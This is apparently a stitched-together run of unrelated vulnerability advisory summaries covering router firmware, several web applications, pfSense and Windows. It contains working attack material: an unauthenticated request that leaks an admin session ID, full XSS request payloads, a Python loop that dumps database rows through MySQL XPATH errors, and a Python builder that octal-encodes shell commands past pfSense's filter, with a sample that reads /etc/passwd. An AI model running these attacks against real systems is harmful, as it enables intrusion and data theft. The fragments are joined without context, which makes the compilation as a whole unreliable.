A vulnerability in the Gemtek CPE7000 (model ID WLTCS-106) allows unauthenticated remote attackers to retrieve a valid administrative SID (session ID). To obtain an administrative web session, set the cookie in the client as follows: userlevel=2;sid=<SID>. Tested on hardware version V02A and firmware version 01.01.02.082.
A persistent input validation (mail encoding) web vulnerability has been discovered in the official C & C++ for OS web application (API). It allows a remote attacker to inject malicious script code that is stored on the application side of the vulnerable service module. The vulnerability is located in the `name` and `message` values of the `contact` module: remote attackers can inject their own script code into these two values.
A persistent input validation web vulnerability has been discovered in the official Totemomail v4.x and v5.x web application. It allows remote attackers to bypass the filter validation and inject malicious script code that is stored on the application side (persistent).
The sysconf.cgi application leaks a valid SID (session ID) in response to the following unauthenticated request: GET /cgi-bin/sysconf.cgi?page=ajax.asp&action=login_confirm HTTP/1.1. The response body has the form <checkcode>,<sid>. The SID obtained this way can be used to unlock the client-side administration interface and/or to directly issue requests that are normally restricted to administrative accounts. The same sysconf.cgi application also fails to sanitize user input, allowing an attacker to hijack the command line passed to the 'iperf' binary, a commonly used network testing tool that creates TCP and UDP data streams and measures the throughput of the network carrying them.
This module retrieves the Active Directory (LDAP) account saved in Symantec Messaging Gateway and decrypts it with the disclosed Symantec PBE key. Authentication is required to retrieve the LDAP credentials: at least a read-only account is needed. Versions 10.6.0-7 and earlier are affected.
phpLiteAdmin is a web-based SQLite database admin tool written in PHP with support for SQLite3 and SQLite2. Two cross-site scripting (XSS) issues:

XSS1
URL: http://localhost/phpliteadmin/phpliteadmin.php?action=table_create&confirm=1
METHOD: POST
PARAMETER: 0_defaultoption
PAYLOAD: "><script>alert(1)</script>
Request:

POST /phpliteadmin/phpliteadmin.php?action=table_create&confirm=1 HTTP/1.1

tablename=testtable&rows=2&0_field=id&0_type=INTEGER&0_defaultoption=defined"><script>alert(1)</script>&0_defaultvalue=1&1_field=name&1_type=INTEGER&1_defaultoption=defined&1_defaultvalue=test

XSS2
URL: http://localhost/phpliteadmin/phpliteadmin.php?view=import
METHOD: POST
PARAMETER: file (filename)
PAYLOAD: "><script>alert(2)</script>
Request:

POST /phpliteadmin/phpliteadmin.php?view=import HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------1675024292505
Content-Length: 1124

-----------------------------1675024292505
Content-Disposition: form-data; name="import_type"

sql
-----------------------------1675024292505
Content-Disposition: form-data; name="single_table"

testtable
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_fieldsterminated"

;
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_enclosed"

"
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_escaped"


-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_newline"

auto
-----------------------------1675024292505
Content-Disposition: form-data; name="import_csv_replace"

on
-----------------------------1675024292505
Content-Disposition: form-data; name="file"; filename=""><script>alert(2)</script>


-----------------------------1675024292505--
PHPBack v1.3.0 is vulnerable to boolean-based blind and error-based SQL injection in the 'orderby' parameter. By injecting a query that uses the MySQL XPATH function ExtractValue(), data can be recovered from the errors it generates. This is useful when the application returns nothing but MySQL error messages: the evaluated result of the injected subquery is embedded in the error text. Prepending a colon (0x3a) to the value guarantees that the resulting string is never valid XPath, so parsing always fails and the error message carries the extracted data. This method works only on MySQL >= 5.1; a LIMIT clause is then used to walk through the database one row at a time.
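The ExtractValue() extraction loop described above, written out as an added Python example (not PHPBack code and not part of the original advisory). It builds the injected expression for one row and one window of the result, parses the value back out of the MySQL XPATH error text, and iterates LIMIT and SUBSTRING until the result set is exhausted. The endpoint is replaced by a constructed stand-in that mimics MySQL's error message, so the example runs offline; the sample schema names are invented.

```python
import re
from typing import Callable, List, Optional

# MySQL >= 5.1 echoes the string it could not parse as XPath back in the error:
#   ERROR 1105 (HY000): XPATH syntax error: ':phpback'
XPATH_ERROR = re.compile(r"XPATH syntax error: '(?P<leaked>[^']*)'")

# MySQL truncates the echoed string to 32 characters; one is the leading colon,
# so each query returns at most 31 characters of data.
CHUNK = 31


def build_payload(inner_query: str, row: int = 0, offset: int = 1) -> str:
    """Build the expression injected into 'orderby' for one row and one window.

    0x3a is ':'. Putting it first makes the CONCAT() result invalid XPath, so
    ExtractValue() always fails and the error text carries the data. LIMIT row,1
    picks a single row; SUBSTRING() picks a 31-character window of it.
    """
    window = f"SUBSTRING(({inner_query} LIMIT {row},1),{offset},{CHUNK})"
    return f"ExtractValue(1,CONCAT(0x3a,{window}))"


def parse_error(body: str) -> Optional[str]:
    """Return the data leaked through a MySQL XPATH error, or None if absent."""
    m = XPATH_ERROR.search(body)
    return m.group("leaked")[1:] if m else None  # drop the 0x3a marker


def dump_rows(send: Callable[[str], str], inner_query: str, max_rows: int = 50) -> List[str]:
    """Walk LIMIT (rows) and SUBSTRING (windows) until a row comes back empty.

    `send(payload) -> response body` is whatever transport the tester uses.
    """
    rows: List[str] = []
    for row in range(max_rows):
        value, offset = "", 1
        while True:
            leaked = parse_error(send(build_payload(inner_query, row, offset)))
            if not leaked:
                break
            value += leaked
            if len(leaked) < CHUNK:      # short window: the row is complete
                break
            offset += CHUNK
        if not value:                    # LIMIT ran past the last row
            break
        rows.append(value)
    return rows


def make_fake_server(table: List[str]) -> Callable[[str], str]:
    """Constructed stand-in for the vulnerable endpoint (not PHPBack code).

    It does not run SQL; it recognises the payload shape built above and
    answers with the error text a real MySQL server would produce.
    """
    shape = re.compile(r"LIMIT (\d+),1\),(\d+),(\d+)\)")

    def send(payload: str) -> str:
        m = shape.search(payload)
        if m is None:
            return "<html>ok</html>"
        row, offset, length = (int(g) for g in m.groups())
        if row >= len(table):            # LIMIT past the end yields NULL: no error
            return "<html>ok</html>"
        piece = table[row][offset - 1:offset - 1 + length]
        return f"<b>Warning</b>: XPATH syntax error: ':{piece}'"

    return send


if __name__ == "__main__":
    # Constructed sample data standing in for information_schema results.
    fake = make_fake_server(["phpback", "information_schema", "a" * 40])
    print(dump_rows(fake, "SELECT schema_name FROM information_schema.schemata"))
```

Against a real target, `send` would URL-encode the payload into the 'orderby' parameter and return the response body; everything else stays the same. The 31-character windowing matters in practice, since table and column names from information_schema routinely exceed the limit.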
modified eCommerce is an open-source shop software. The GET parameters 'orders_status' and 'customers_status' of 'easybillcsv.php' are attackable. By default the easybill module is not installed and the constant MODULE_EASYBILL_CSV_CRON_TOKEN is not defined. As long as the module is not installed, the token check can be bypassed with [Shoproot]/api/easybill/easybillcsv.php?token=MODULE_EASYBILL_CSV_CRON_TOKEN, because PHP 5 and 7 evaluate an undefined constant to its own name as a string (with a notice), so the literal constant name is accepted as the token. The variables $this->from_orders_status and $this->from_customers_status are set in lines 20 and 21 of the script, exploded into arrays in lines 25 and 26, converted to integers in lines 30 and 31 and imploded back into strings in lines 35 and 36. In lines 40 and 41 they are used in an SQL query inside single quotes, and in lines 45 and 46 inside brackets.
The pfSense community edition firewall is affected by multiple vulnerabilities, including remote code execution via command injection by an authenticated non-administrative user, as well as stored and reflected cross-site scripting. The status_rrd_graph_img.php page is vulnerable to command injection via the graph GET parameter. A non-administrative authenticated attacker with access to the graph status functionality can inject arbitrary operating system commands that execute as root. Although the graph parameter is validated with a regular expression filter, the pipe character is not removed. Octal escape sequences can be used to encode a payload that passes the filter for illegal characters and creates a PHP file which downloads and executes a malicious file (e.g. a reverse shell) from a remote attacker-controlled host.
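The octal-encoding bypass described above, as an added Python example that is not pfSense code and not part of the original advisory. The advisory does not quote the regular expression used by status_rrd_graph_img.php, so the filter here is an assumed stand-in that rejects everything outside letters, digits, `_`, `-`, `.`, `|`, `\`, `"` and space; the `|printf "..."|sh` carrier and the sample command are likewise assumptions. The point demonstrated is that the command itself never has to pass the filter: only the pipe, `printf`, `sh` and `\NNN` digits do, and printf(1) rebuilds the original bytes at runtime.

```python
import re

# Assumption: stand-in for the pfSense filter, which the advisory describes only
# as a regular expression that blocks illegal characters but leaves '|' intact.
ASSUMED_FILTER = re.compile(r'[^A-Za-z0-9_.\-|\\" ]')


def passes_filter(value: str) -> bool:
    """True if the value contains no character the stand-in filter rejects."""
    return ASSUMED_FILTER.search(value) is None


def octal_encode(command: str) -> str:
    """Encode every byte as a three-digit \\NNN escape, as printf(1) expands it.

    Three digits are always used so that a digit following the escape in the
    payload cannot be absorbed into the escape itself.
    """
    return "".join(f"\\{b:03o}" for b in command.encode())


def build_graph_param(command: str) -> str:
    """Build the 'graph' parameter value (assumed carrier, see lead-in).

    '|' survives the filter per the advisory; printf turns the escapes back into
    bytes and sh executes them, so the command itself never meets the filter.
    """
    return f'|printf "{octal_encode(command)}"|sh'


def printf_decode(fmt: str) -> str:
    """Model of printf(1) octal-escape expansion, used to confirm the round trip."""
    return re.sub(r"\\([0-7]{3})", lambda m: chr(int(m.group(1), 8)), fmt)


if __name__ == "__main__":
    # Constructed sample command; the real payload per the advisory writes a PHP
    # file that fetches and runs an attacker-hosted script.
    cmd = "id > /tmp/.o; cat /etc/passwd >> /tmp/.o"
    param = build_graph_param(cmd)
    print(passes_filter(cmd), passes_filter(param))  # False True
    print(printf_decode(octal_encode(cmd)) == cmd)   # True
```

The defensive reading is the same: a character denylist on a value that reaches a shell is not a fix, because the shell and its utilities provide their own decoders. Validating against a strict allowlist of known graph names, or never passing the value through a shell at all, removes the problem.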
This vulnerability is an out-of-bounds write on 64-bit Windows 7: the affected code writes to an unmapped memory region. On 32-bit Windows 7 the same flaw manifests as a null-pointer read.